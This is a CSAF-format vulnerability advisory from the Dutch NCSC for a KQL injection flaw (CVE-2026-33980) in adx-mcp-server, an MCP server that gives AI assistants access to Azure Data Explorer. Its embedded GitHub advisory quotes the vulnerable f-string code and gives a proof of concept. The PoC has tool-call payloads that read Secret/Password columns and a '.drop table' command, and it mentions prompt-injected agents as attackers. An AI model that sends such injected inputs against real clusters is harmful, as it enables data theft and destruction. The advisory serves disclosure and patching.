{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33980", "tracking": { "current_release_date": "2026-03-30T20:50:19.805566Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33980", "initial_release_date": "2026-03-28T07:40:15.853708Z", "revision_history": [ { "date": "2026-03-28T07:40:15.853708Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-03-28T07:40:16.496820Z", "number": "2", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (2).| CWES updated (1).| Unknown change." }, { "date": "2026-03-28T07:40:21.191333Z", "number": "3", "summary": "NCSC Score created." }, { "date": "2026-03-28T07:41:24.578817Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-28T07:41:27.239716Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-03-29T00:38:27.627116Z", "number": "6", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-30T20:47:08.445655Z", "number": "7", "summary": "References created (1)." } ], "status": "interim", "version": "7" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<=1.1.0", "product": { "name": "vers:unknown/<=1.1.0", "product_id": "CSAFPID-5956294" } } ], "category": "product_name", "name": "adx-mcp-server" } ], "category": "vendor", "name": "pab1it0" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33980", "cwe": { "id": "CWE-943", "name": "Improper Neutralization of Special Elements in Data Query Logic" }, "notes": [ { "category": "description", "text": "Azure Data Explorer MCP Server is a Model Context Protocol (MCP) server that enables AI assistants to execute KQL queries and explore Azure Data Explorer (ADX/Kusto) databases through standardized interfaces. Versions up to and including 0.1.1 contain KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: `get_table_schema`, `sample_table_data`, and `get_table_details`. The `table_name` parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster. Commit 0abe0ee55279e111281076393e5e966335fffd30 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33980" }, { "category": "description", "text": "Azure Data Explorer MCP Server is a Model Context Protocol (MCP) server that enables AI assistants to execute KQL queries and explore Azure Data Explorer (ADX/Kusto) databases through standardized interfaces. Versions up to and including 0.1.1 contain KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: `get_table_schema`, `sample_table_data`, and `get_table_details`. The `table_name` parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster. Commit 0abe0ee55279e111281076393e5e966335fffd30 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33980.json" }, { "category": "description", "text": "### Summary\n\nadx-mcp-server (<= latest, commit 48b2933) contains KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: `get_table_schema`, `sample_table_data`, and `get_table_details`. The `table_name` parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster.\n\n### Details\n\nThe MCP tools construct KQL queries by directly embedding the `table_name` parameter into query strings:\n\n**Vulnerable code** ([permalink](https://github.com/pab1it0/adx-mcp-server/blob/48b2933/src/adx_mcp_server/server.py#L228)):\n\n```python\n@mcp.tool(...)\nasync def get_table_schema(table_name: str) -> List[Dict[str, Any]]:\n client = get_kusto_client()\n query = f\"{table_name} | getschema\" # <-- KQL injection\n result_set = client.execute(config.database, query)\n```\n\n```python\n@mcp.tool(...)\nasync def sample_table_data(table_name: str, sample_size: int = 10) -> List[Dict[str, Any]]:\n client = get_kusto_client()\n query = f\"{table_name} | sample {sample_size}\" # <-- KQL injection\n result_set = client.execute(config.database, query)\n```\n\n```python\n@mcp.tool(...)\nasync def get_table_details(table_name: str) -> List[Dict[str, Any]]:\n client = get_kusto_client()\n query = f\".show table {table_name} details\" # <-- KQL injection\n result_set = client.execute(config.database, query)\n```\n\nKQL allows chaining query operators with `|` and executing management commands prefixed with `.`. An attacker can inject:\n- `sensitive_table | project Secret, Password | take 100 //` to read arbitrary tables\n- Newline-separated management commands like `.drop table important_data` via `get_table_details`\n- Arbitrary KQL analytics queries via any of the three tools\n\n**Note:** While the server also has an `execute_query` tool that accepts raw KQL by design, the three vulnerable tools are presented as safe metadata-inspection tools. MCP clients may grant automatic access to \"safe\" tools while requiring confirmation for `execute_query`. The injection bypasses this trust boundary.\n\n### PoC\n\n```python\n# PoC: KQL Injection via get_table_schema tool\n# The table_name parameter is injected into: f\"{table_name} | getschema\"\n\nimport json\n\n# MCP tool call that exfiltrates data from a sensitive table\ntool_call = {\n \"name\": \"get_table_schema\",\n \"arguments\": {\n \"table_name\": \"sensitive_data | project Secret, Password | take 100 //\"\n }\n}\nprint(json.dumps(tool_call, indent=2))\n\n# Resulting KQL: \"sensitive_data | project Secret, Password | take 100 // | getschema\"\n# The // comments out \"| getschema\", executing an arbitrary data query instead\n\n# Destructive example via get_table_details:\ntool_call_destructive = {\n \"name\": \"get_table_details\",\n \"arguments\": {\n \"table_name\": \"users details\\n.drop table critical_data\"\n }\n}\n# Resulting KQL:\n# .show table users details\n# .drop table critical_data details\n```", "title": "github - https://api.github.com/advisories/GHSA-vphc-468g-8rfp" }, { "category": "other", "text": "0.00046", "title": "EPSS" }, { "category": "other", "text": "3.9", "title": "NCSC Score" }, { "category": "other", "text": "There is cwe data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5956294" ] }, "references": [ { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33980" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33980.json" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-vphc-468g-8rfp" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/pab1it0/adx-mcp-server/commit/0abe0ee55279e111281076393e5e966335fffd30" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/pab1it0/adx-mcp-server/security/advisories/GHSA-vphc-468g-8rfp" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-vphc-468g-8rfp" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33980" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L", "baseScore": 8.3, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5956294" ] } ], "title": "CVE-2026-33980" } ] }